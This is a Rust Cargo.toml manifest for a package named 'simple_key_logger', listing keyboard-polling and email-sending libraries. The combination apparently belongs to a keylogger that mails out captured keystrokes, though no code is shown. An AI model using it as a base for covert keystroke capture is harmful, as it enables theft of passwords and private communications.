[package]
name = "simple_key_logger"
version = "0.1.0"
authors = ["Haha nice try"]
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
device_query = "2.0.0"
lettre = "0.9"
lettre_email = "0.9"
mime = "0.3.13"
chrono = "0.4.39"
tokio = {version = "1.17", features = ["full"]}
